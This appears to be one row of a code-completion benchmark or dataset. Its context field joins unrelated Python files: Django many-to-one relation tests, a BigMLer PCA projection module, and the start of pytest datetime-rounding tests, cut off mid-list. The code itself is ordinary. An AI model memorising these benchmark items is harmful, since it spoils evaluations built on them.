gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
import datetime
from copy import deepcopy
from django.core.exceptions import FieldError, MultipleObjectsReturned
from django.db import models, transaction
from django.test import TestCase
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.translation import ugettext_lazy
from .models import (
Article, Category, Child, City, District, First, Parent, Record, Relation,
Reporter, School, Student, Third, ToFieldChild,
)
class ManyToOneTests(TestCase):
def setUp(self):
# Create a few Reporters.
self.r = Reporter(first_name='John', last_name='Smith', email='john@example.com')
self.r.save()
self.r2 = Reporter(first_name='Paul', last_name='Jones', email='paul@example.com')
self.r2.save()
# Create an Article.
self.a = Article(id=None, headline="This is a test",
pub_date=datetime.date(2005, 7, 27), reporter=self.r)
self.a.save()
def test_get(self):
# Article objects have access to their related Reporter objects.
r = self.a.reporter
self.assertEqual(r.id, self.r.id)
# These are strings instead of unicode strings because that's what was used in
# the creation of this reporter (and we haven't refreshed the data from the
# database, which always returns unicode strings).
self.assertEqual((r.first_name, self.r.last_name), ('John', 'Smith'))
def test_create(self):
# You can also instantiate an Article by passing the Reporter's ID
# instead of a Reporter object.
a3 = Article(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
a3.save()
self.assertEqual(a3.reporter.id, self.r.id)
# Similarly, the reporter ID can be a string.
a4 = Article(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
a4.save()
self.assertEqual(repr(a4.reporter), "<Reporter: John Smith>")
def test_add(self):
# Create an Article via the Reporter object.
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.assertEqual(repr(new_article), "<Article: John's second story>")
self.assertEqual(new_article.reporter.id, self.r.id)
# Create a new article, and add it to the article set.
new_article2 = Article(headline="Paul's story", pub_date=datetime.date(2006, 1, 17))
msg = "<Article: Paul's story> instance isn't saved. Use bulk=False or save the object first."
with self.assertRaisesMessage(ValueError, msg):
self.r.article_set.add(new_article2)
self.r.article_set.add(new_article2, bulk=False)
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
# Add the same article to a different article set - check that it moves.
self.r2.article_set.add(new_article2)
self.assertEqual(new_article2.reporter.id, self.r2.id)
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
# Adding an object of the wrong type raises TypeError.
with transaction.atomic():
with six.assertRaisesRegex(self, TypeError,
"'Article' instance expected, got <Reporter.*"):
self.r.article_set.add(self.r2)
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
def test_set(self):
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
new_article2 = self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Assign the article to the reporter.
new_article2.reporter = self.r
new_article2.save()
self.assertEqual(repr(new_article2.reporter), "<Reporter: John Smith>")
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), [])
# Set the article back again.
self.r2.article_set.set([new_article, new_article2])
self.assertQuerysetEqual(self.r.article_set.all(), ["<Article: This is a test>"])
self.assertQuerysetEqual(self.r2.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
])
# Funny case - because the ForeignKey cannot be null,
# existing members of the set must remain.
self.r.article_set.set([new_article])
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
def test_reverse_assignment_deprecation(self):
msg = (
"Direct assignment to the reverse side of a related set is "
"deprecated due to the implicit save() that happens. Use "
"article_set.set() instead."
)
with self.assertRaisesMessage(RemovedInDjango20Warning, msg):
self.r2.article_set = []
def test_assign(self):
new_article = self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
new_article2 = self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Assign the article to the reporter directly using the descriptor.
new_article2.reporter = self.r
new_article2.save()
self.assertEqual(repr(new_article2.reporter), "<Reporter: John Smith>")
self.assertEqual(new_article2.reporter.id, self.r.id)
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), [])
# Set the article back again using set() method.
self.r2.article_set.set([new_article, new_article2])
self.assertQuerysetEqual(self.r.article_set.all(), ["<Article: This is a test>"])
self.assertQuerysetEqual(self.r2.article_set.all(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
])
# Because the ForeignKey cannot be null, existing members of the set
# must remain.
self.r.article_set.set([new_article])
self.assertQuerysetEqual(self.r.article_set.all(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r2.article_set.all(), ["<Article: Paul's story>"])
# Reporter cannot be null - there should not be a clear or remove method
self.assertFalse(hasattr(self.r2.article_set, 'remove'))
self.assertFalse(hasattr(self.r2.article_set, 'clear'))
def test_selects(self):
self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
# Reporter objects have access to their related Article objects.
self.assertQuerysetEqual(self.r.article_set.all(), [
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(self.r.article_set.filter(headline__startswith='This'),
["<Article: This is a test>"])
self.assertEqual(self.r.article_set.count(), 2)
self.assertEqual(self.r2.article_set.count(), 1)
# Get articles by id
self.assertQuerysetEqual(Article.objects.filter(id__exact=self.a.id),
["<Article: This is a test>"])
self.assertQuerysetEqual(Article.objects.filter(pk=self.a.id),
["<Article: This is a test>"])
# Query on an article property
self.assertQuerysetEqual(Article.objects.filter(headline__startswith='This'),
["<Article: This is a test>"])
# The API automatically follows relationships as far as you need.
# Use double underscores to separate relationships.
# This works as many levels deep as you want. There's no limit.
# Find all Articles for any Reporter whose first name is "John".
self.assertQuerysetEqual(Article.objects.filter(reporter__first_name__exact='John'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Check that implied __exact also works
self.assertQuerysetEqual(Article.objects.filter(reporter__first_name='John'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Query twice over the related field.
self.assertQuerysetEqual(
Article.objects.filter(reporter__first_name__exact='John',
reporter__last_name__exact='Smith'),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# The underlying query only makes one join when a related table is referenced twice.
queryset = Article.objects.filter(reporter__first_name__exact='John',
reporter__last_name__exact='Smith')
self.assertNumQueries(1, list, queryset)
self.assertEqual(queryset.query.get_compiler(queryset.db).as_sql()[0].count('INNER JOIN'), 1)
# The automatically joined table has a predictable name.
self.assertQuerysetEqual(
Article.objects.filter(reporter__first_name__exact='John').extra(
where=["many_to_one_reporter.last_name='Smith'"]),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# ... and should work fine with the unicode that comes out of forms.Form.cleaned_data
self.assertQuerysetEqual(
(Article.objects
.filter(reporter__first_name__exact='John')
.extra(where=["many_to_one_reporter.last_name='%s'" % 'Smith'])),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
# Find all Articles for a Reporter.
# Use direct ID check, pk check, and object comparison
self.assertQuerysetEqual(
Article.objects.filter(reporter__id__exact=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__pk=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter=self.r.id),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter=self.r),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__in=[self.r.id, self.r2.id]).distinct(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(
Article.objects.filter(reporter__in=[self.r, self.r2]).distinct(),
[
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: This is a test>",
])
# You can also use a queryset instead of a literal list of instances.
# The queryset must be reduced to a list of values using values(),
# then converted into a query
self.assertQuerysetEqual(
Article.objects.filter(
reporter__in=Reporter.objects.filter(first_name='John').values('pk').query
).distinct(),
[
"<Article: John's second story>",
"<Article: This is a test>",
])
def test_reverse_selects(self):
a3 = Article.objects.create(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
Article.objects.create(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
# Reporters can be queried
self.assertQuerysetEqual(Reporter.objects.filter(id__exact=self.r.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(pk=self.r.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(first_name__startswith='John'),
["<Reporter: John Smith>"])
# Reporters can query in opposite direction of ForeignKey definition
self.assertQuerysetEqual(Reporter.objects.filter(article__id__exact=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article__pk=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article=self.a.id),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(Reporter.objects.filter(article=self.a),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a.id, a3.id]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a.id, a3]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__in=[self.a, a3]).distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__headline__startswith='T'),
["<Reporter: John Smith>", "<Reporter: John Smith>"],
ordered=False
)
self.assertQuerysetEqual(
Reporter.objects.filter(article__headline__startswith='T').distinct(),
["<Reporter: John Smith>"])
# Counting in the opposite direction works in conjunction with distinct()
self.assertEqual(
Reporter.objects.filter(article__headline__startswith='T').count(), 2)
self.assertEqual(
Reporter.objects.filter(article__headline__startswith='T').distinct().count(), 1)
# Queries can go round in circles.
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__first_name__startswith='John'),
[
"<Reporter: John Smith>",
"<Reporter: John Smith>",
"<Reporter: John Smith>",
],
ordered=False
)
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__first_name__startswith='John').distinct(),
["<Reporter: John Smith>"])
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter__exact=self.r).distinct(),
["<Reporter: John Smith>"])
# Check that implied __exact also works.
self.assertQuerysetEqual(
Reporter.objects.filter(article__reporter=self.r).distinct(),
["<Reporter: John Smith>"])
# It's possible to use values() calls across many-to-one relations.
# (Note, too, that we clear the ordering here so as not to drag the
# 'headline' field into the columns being used to determine uniqueness)
d = {'reporter__first_name': 'John', 'reporter__last_name': 'Smith'}
self.assertEqual([d],
list(Article.objects.filter(reporter=self.r).distinct().order_by()
.values('reporter__first_name', 'reporter__last_name')))
def test_select_related(self):
# Check that Article.objects.select_related().dates() works properly when
# there are multiple Articles with the same date but different foreign-key
# objects (Reporters).
r1 = Reporter.objects.create(first_name='Mike', last_name='Royko', email='royko@suntimes.com')
r2 = Reporter.objects.create(first_name='John', last_name='Kass', email='jkass@tribune.com')
Article.objects.create(headline='First', pub_date=datetime.date(1980, 4, 23), reporter=r1)
Article.objects.create(headline='Second', pub_date=datetime.date(1980, 4, 23), reporter=r2)
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'day')),
[
datetime.date(1980, 4, 23),
datetime.date(2005, 7, 27),
])
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'month')),
[
datetime.date(1980, 4, 1),
datetime.date(2005, 7, 1),
])
self.assertEqual(list(Article.objects.select_related().dates('pub_date', 'year')),
[
datetime.date(1980, 1, 1),
datetime.date(2005, 1, 1),
])
def test_delete(self):
self.r.article_set.create(headline="John's second story",
pub_date=datetime.date(2005, 7, 29))
self.r2.article_set.create(headline="Paul's story",
pub_date=datetime.date(2006, 1, 17))
Article.objects.create(id=None, headline="Third article",
pub_date=datetime.date(2005, 7, 27), reporter_id=self.r.id)
Article.objects.create(id=None, headline="Fourth article",
pub_date=datetime.date(2005, 7, 27), reporter_id=str(self.r.id))
# If you delete a reporter, his articles will be deleted.
self.assertQuerysetEqual(Article.objects.all(),
[
"<Article: Fourth article>",
"<Article: John's second story>",
"<Article: Paul's story>",
"<Article: Third article>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(Reporter.objects.order_by('first_name'),
[
"<Reporter: John Smith>",
"<Reporter: Paul Jones>",
])
self.r2.delete()
self.assertQuerysetEqual(Article.objects.all(),
[
"<Article: Fourth article>",
"<Article: John's second story>",
"<Article: Third article>",
"<Article: This is a test>",
])
self.assertQuerysetEqual(Reporter.objects.order_by('first_name'),
["<Reporter: John Smith>"])
# You can delete using a JOIN in the query.
Reporter.objects.filter(article__headline__startswith='This').delete()
self.assertQuerysetEqual(Reporter.objects.all(), [])
self.assertQuerysetEqual(Article.objects.all(), [])
def test_explicit_fk(self):
# Create a new Article with get_or_create using an explicit value
# for a ForeignKey.
a2, created = Article.objects.get_or_create(id=None,
headline="John's second test",
pub_date=datetime.date(2011, 5, 7),
reporter_id=self.r.id)
self.assertTrue(created)
self.assertEqual(a2.reporter.id, self.r.id)
# You can specify filters containing the explicit FK value.
self.assertQuerysetEqual(
Article.objects.filter(reporter_id__exact=self.r.id),
[
"<Article: John's second test>",
"<Article: This is a test>",
])
# Create an Article by Paul for the same date.
a3 = Article.objects.create(id=None, headline="Paul's commentary",
pub_date=datetime.date(2011, 5, 7),
reporter_id=self.r2.id)
self.assertEqual(a3.reporter.id, self.r2.id)
# Get should respect explicit foreign keys as well.
with self.assertRaises(MultipleObjectsReturned):
Article.objects.get(reporter_id=self.r.id)
self.assertEqual(repr(a3),
repr(Article.objects.get(reporter_id=self.r2.id,
pub_date=datetime.date(2011, 5, 7))))
def test_deepcopy_and_circular_references(self):
# Regression for #12876 -- Model methods that include queries that
# recursive don't cause recursion depth problems under deepcopy.
self.r.cached_query = Article.objects.filter(reporter=self.r)
self.assertEqual(repr(deepcopy(self.r)), "<Reporter: John Smith>")
def test_manager_class_caching(self):
r1 = Reporter.objects.create(first_name='Mike')
r2 = Reporter.objects.create(first_name='John')
# Same twice
self.assertIs(r1.article_set.__class__, r1.article_set.__class__)
# Same as each other
self.assertIs(r1.article_set.__class__, r2.article_set.__class__)
def test_create_relation_with_ugettext_lazy(self):
reporter = Reporter.objects.create(first_name='John',
last_name='Smith',
email='john.smith@example.com')
lazy = ugettext_lazy('test')
reporter.article_set.create(headline=lazy,
pub_date=datetime.date(2011, 6, 10))
notlazy = six.text_type(lazy)
article = reporter.article_set.get()
self.assertEqual(article.headline, notlazy)
def test_values_list_exception(self):
expected_message = "Cannot resolve keyword 'notafield' into field. Choices are: %s"
reporter_fields = ', '.join(sorted(f.name for f in Reporter._meta.get_fields()))
with self.assertRaisesMessage(FieldError, expected_message % reporter_fields):
Article.objects.values_list('reporter__notafield')
article_fields = ', '.join(['EXTRA'] + sorted(f.name for f in Article._meta.get_fields()))
with self.assertRaisesMessage(FieldError, expected_message % article_fields):
Article.objects.extra(select={'EXTRA': 'EXTRA_SELECT'}).values_list('notafield')
def test_fk_assignment_and_related_object_cache(self):
# Tests of ForeignKey assignment and the related-object cache (see #6886).
p = Parent.objects.create(name="Parent")
c = Child.objects.create(name="Child", parent=p)
# Look up the object again so that we get a "fresh" object.
c = Child.objects.get(name="Child")
p = c.parent
# Accessing the related object again returns the exactly same object.
self.assertIs(c.parent, p)
# But if we kill the cache, we get a new object.
del c._parent_cache
self.assertIsNot(c.parent, p)
# Assigning a new object results in that object getting cached immediately.
p2 = Parent.objects.create(name="Parent 2")
c.parent = p2
self.assertIs(c.parent, p2)
# Assigning None succeeds if field is null=True.
p.bestchild = None
self.assertIsNone(p.bestchild)
# bestchild should still be None after saving.
p.save()
self.assertIsNone(p.bestchild)
# bestchild should still be None after fetching the object again.
p = Parent.objects.get(name="Parent")
self.assertIsNone(p.bestchild)
# Assigning None fails: Child.parent is null=False.
with self.assertRaises(ValueError):
setattr(c, "parent", None)
# You also can't assign an object of the wrong type here
with self.assertRaises(ValueError):
setattr(c, "parent", First(id=1, second=1))
# Nor can you explicitly assign None to Child.parent during object
# creation (regression for #9649).
with self.assertRaises(ValueError):
Child(name='xyzzy', parent=None)
with self.assertRaises(ValueError):
Child.objects.create(name='xyzzy', parent=None)
# Creation using keyword argument should cache the related object.
p = Parent.objects.get(name="Parent")
c = Child(parent=p)
self.assertIs(c.parent, p)
# Creation using keyword argument and unsaved related instance (#8070).
p = Parent()
msg = "save() prohibited to prevent data loss due to unsaved related object 'parent'."
with self.assertRaisesMessage(ValueError, msg):
Child.objects.create(parent=p)
msg = "save() prohibited to prevent data loss due to unsaved related object 'parent'."
with self.assertRaisesMessage(ValueError, msg):
ToFieldChild.objects.create(parent=p)
# Creation using attname keyword argument and an id will cause the
# related object to be fetched.
p = Parent.objects.get(name="Parent")
c = Child(parent_id=p.id)
self.assertIsNot(c.parent, p)
self.assertEqual(c.parent, p)
def test_fk_to_bigautofield(self):
ch = City.objects.create(name='Chicago')
District.objects.create(city=ch, name='Far South')
District.objects.create(city=ch, name='North')
ny = City.objects.create(name='New York', id=2 ** 33)
District.objects.create(city=ny, name='Brooklyn')
District.objects.create(city=ny, name='Manhattan')
def test_multiple_foreignkeys(self):
# Test of multiple ForeignKeys to the same model (bug #7125).
c1 = Category.objects.create(name='First')
c2 = Category.objects.create(name='Second')
c3 = Category.objects.create(name='Third')
r1 = Record.objects.create(category=c1)
r2 = Record.objects.create(category=c1)
r3 = Record.objects.create(category=c2)
r4 = Record.objects.create(category=c2)
r5 = Record.objects.create(category=c3)
Relation.objects.create(left=r1, right=r2)
Relation.objects.create(left=r3, right=r4)
Relation.objects.create(left=r1, right=r3)
Relation.objects.create(left=r5, right=r2)
Relation.objects.create(left=r3, right=r2)
q1 = Relation.objects.filter(left__category__name__in=['First'], right__category__name__in=['Second'])
self.assertQuerysetEqual(q1, ["<Relation: First - Second>"])
q2 = Category.objects.filter(record__left_set__right__category__name='Second').order_by('name')
self.assertQuerysetEqual(q2, ["<Category: First>", "<Category: Second>"])
p = Parent.objects.create(name="Parent")
c = Child.objects.create(name="Child", parent=p)
with self.assertRaises(ValueError):
Child.objects.create(name="Grandchild", parent=c)
def test_fk_instantiation_outside_model(self):
# Regression for #12190 -- Should be able to instantiate a FK outside
# of a model, and interrogate its related field.
cat = models.ForeignKey(Category, models.CASCADE)
self.assertEqual('id', cat.remote_field.get_related_field().name)
def test_relation_unsaved(self):
# Test that the <field>_set manager does not join on Null value fields (#17541)
Third.objects.create(name='Third 1')
Third.objects.create(name='Third 2')
th = Third(name="testing")
# The object isn't saved an thus the relation field is null - we won't even
# execute a query in this case.
with self.assertNumQueries(0):
self.assertEqual(th.child_set.count(), 0)
th.save()
# Now the model is saved, so we will need to execute an query.
with self.assertNumQueries(1):
self.assertEqual(th.child_set.count(), 0)
def test_related_object(self):
public_school = School.objects.create(is_public=True)
public_student = Student.objects.create(school=public_school)
private_school = School.objects.create(is_public=False)
private_student = Student.objects.create(school=private_school)
# Only one school is available via all() due to the custom default manager.
self.assertQuerysetEqual(
School.objects.all(),
["<School: School object>"]
)
self.assertEqual(public_student.school, public_school)
# Make sure the base manager is used so that an student can still access
# its related school even if the default manager doesn't normally
# allow it.
self.assertEqual(private_student.school, private_school)
# If the manager is marked "use_for_related_fields", it'll get used instead
# of the "bare" queryset. Usually you'd define this as a property on the class,
# but this approximates that in a way that's easier in tests.
School.objects.use_for_related_fields = True
try:
private_student = Student.objects.get(pk=private_student.pk)
with self.assertRaises(School.DoesNotExist):
private_student.school
finally:
School.objects.use_for_related_fields = False
def test_hasattr_related_object(self):
# The exception raised on attribute access when a related object
# doesn't exist should be an instance of a subclass of `AttributeError`
# refs #21563
self.assertFalse(hasattr(Article(), 'reporter'))
| |
# -*- coding: utf-8 -*-
#
# Copyright 2019-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Linear regression prediction auxiliary functions
"""
import sys
import bigml.api
from bigml.pca import PCA
from bigml.io import UnicodeWriter
import bigmler.utils as u
import bigmler.checkpoint as c
from bigmler.tst_reader import TstReader as TestReader
from bigmler.resourcesapi.batch_projections import create_batch_projection
def use_projection_headers(projection_headers, output, test_reader,
fields, args, pca_headers):
"""Uses header information from the test file in the projection output
If --projection-header is set, adds a headers row to the projection
file.
If --projection-fields is used, retrieves the fields to include
in the projections output
"""
exclude = []
headers = []
input_headers = []
if args.projection_fields:
if test_reader.has_headers():
input_headers = test_reader.raw_headers[:]
else:
# if no headers are found in the test file we assume it has the
# same model input_field structure
input_headers = [fields[field]['name'] for field in
fields.fields_columns]
if args.projection_fields not in [None, "all"]:
projection_fields = [field.strip() for field in
args.projection_fields.split(',')]
# Filter input_headers adding only those chosen by the user
number_of_headers = len(input_headers)
for index in range(0, number_of_headers):
if not input_headers[index] in projection_fields:
exclude.append(index)
exclude = sorted(list(set(exclude)), reverse=True)
for index in exclude:
del input_headers[index]
input_headers.extend(headers)
input_headers.extend(pca_headers)
headers = input_headers
if projection_headers:
output.writerow(headers)
return exclude
def write_projection(projection, output=sys.stdout,
input_data=None,
exclude=None):
"""Writes the final projection to the required output
The format of the output depends on the `prediction_info` value.
There's a brief format, that writes only the predicted value,
and a full data format that writes first the input data
used to predict followed by the prediction.
"""
row = []
# input data is added if --projection-fields is used
if input_data is None:
input_data = []
row = input_data
if exclude and input_data:
for index in exclude:
del row[index]
row.extend(projection)
try:
output.writerow(row)
except AttributeError:
try:
output.write(row)
except AttributeError:
raise AttributeError("You should provide a writeable object")
def _local_pca(pca, args):
"""Create the local PCA object
"""
local_pca = PCA(pca, api=args.retrieve_api_)
kwargs = {}
if args.max_components:
kwargs.update({"max_components": args.max_components})
if args.variance_threshold:
kwargs.update({"variance_threshold": args.variance_threshold})
return local_pca, kwargs
def local_projection(local_pca, kwargs, test_reader, output, args,
exclude=None):
"""Get local pca and issue projection
"""
for input_data in test_reader:
input_data_dict = test_reader.dict(input_data, filtering=False)
projection_info = local_pca.projection(
input_data_dict, **kwargs)
write_projection( \
projection_info,
output,
input_data if args.projection_fields is not None else None,
exclude)
def projection(pca, fields, args, session_file=None):
"""Computes the projection
for each entry in the `test_set`.
"""
test_set = args.test_set
test_set_header = args.test_header
output = args.projections
test_reader = TestReader(test_set, test_set_header, fields, None,
test_separator=args.test_separator)
with UnicodeWriter(output, lineterminator="\n") as output:
local_pca, kwargs = _local_pca(pca, args)
pca_headers = ["PC%s" % (i + 1) for i in \
range(0, len(local_pca.projection({})))]
# columns to exclude if input_data is added to the projections field
exclude = use_projection_headers(
args.projection_header, output, test_reader, fields, args,
pca_headers)
# Local projection: Projections are computed locally
message = u.dated("Creating local projections.\n")
u.log_message(message, log_file=session_file, console=args.verbosity)
local_projection(local_pca, kwargs, test_reader,
output, args, exclude=exclude)
test_reader.close()
def remote_projection(pca, test_dataset,
batch_projection_args, args,
api, resume, projection_file=None, session_file=None,
path=None, log=None):
"""Computes a projection for each entry in the `test_set`.
Projections are computed remotely using the batch projection call.
"""
pca_id = bigml.api.get_pca_id(pca)
# if resuming, try to extract dataset form log files
if resume:
message = u.dated("Batch projection not found. Resuming.\n")
resume, batch_projection = c.checkpoint(
c.is_batch_projection_created, path, debug=args.debug,
message=message, log_file=session_file, console=args.verbosity)
if not resume:
batch_projection = create_batch_projection(
pca_id, test_dataset, batch_projection_args,
args, api, session_file=session_file, path=path, log=log)
if not args.no_csv:
file_name = api.download_batch_projection(batch_projection,
projection_file)
if file_name is None:
sys.exit("Failed downloading CSV.")
if args.to_dataset:
batch_projection = bigml.api.check_resource(batch_projection, api=api)
new_dataset = bigml.api.get_dataset_id(
batch_projection['object']['output_dataset_resource'])
if new_dataset is not None:
message = u.dated("Batch projection dataset created: %s\n"
% u.get_url(new_dataset))
u.log_message(message, log_file=session_file,
console=args.verbosity)
u.log_created_resources("batch_projection_dataset",
path, new_dataset, mode='a')
| |
# -*- coding: utf-8 -*-
# Copyright (c) 2018 the Pockets team, see AUTHORS.
# Licensed under the BSD License, see LICENSE for details.
"""Tests for :mod:`pockets.collections` module."""
from __future__ import absolute_import, print_function
from datetime import datetime, timedelta
import pytest
import pytz
from pockets.datetime import ceil_datetime, floor_datetime, round_datetime
NEW_YORK = pytz.timezone("America/New_York")
@pytest.mark.parametrize(
"dt,nearest,expected",
[
(
datetime(2012, 12, 31, 23, 59, 31, 999999),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 31),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 30),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 29),
timedelta(minutes=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 31),
timedelta(hours=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 30),
timedelta(hours=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 29),
timedelta(hours=1),
datetime(2013, 1, 1),
),
(
datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(datetime(2012, 12, 31, 13), timedelta(days=1), datetime(2013, 1, 1)),
(datetime(2012, 12, 31, 12), timedelta(days=1), datetime(2013, 1, 1)),
(datetime(2012, 12, 31, 11), timedelta(days=1), datetime(2013, 1, 1)),
(
datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
timedelta(days=1),
datetime(2013, 1, 1, tzinfo=NEW_YORK),
),
],
)
def test_ceil_datetime(dt, nearest, expected):
assert ceil_datetime(dt, nearest) == expected
@pytest.mark.parametrize(
"dt,nearest,expected",
[
(
datetime(2012, 12, 31, 23, 59, 31, 999999),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59),
),
(
datetime(2012, 12, 31, 23, 59, 31),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59),
),
(
datetime(2012, 12, 31, 23, 59, 30),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59),
),
(
datetime(2012, 12, 31, 23, 59, 29),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59),
),
(
datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
timedelta(minutes=1),
datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 31),
timedelta(hours=1),
datetime(2012, 12, 31, 23),
),
(
datetime(2012, 12, 31, 23, 30),
timedelta(hours=1),
datetime(2012, 12, 31, 23),
),
(
datetime(2012, 12, 31, 23, 29),
timedelta(hours=1),
datetime(2012, 12, 31, 23),
),
(
datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
timedelta(hours=1),
datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
),
(
datetime(2012, 12, 31, 13),
timedelta(days=1),
datetime(2012, 12, 31),
),
(
datetime(2012, 12, 31, 12),
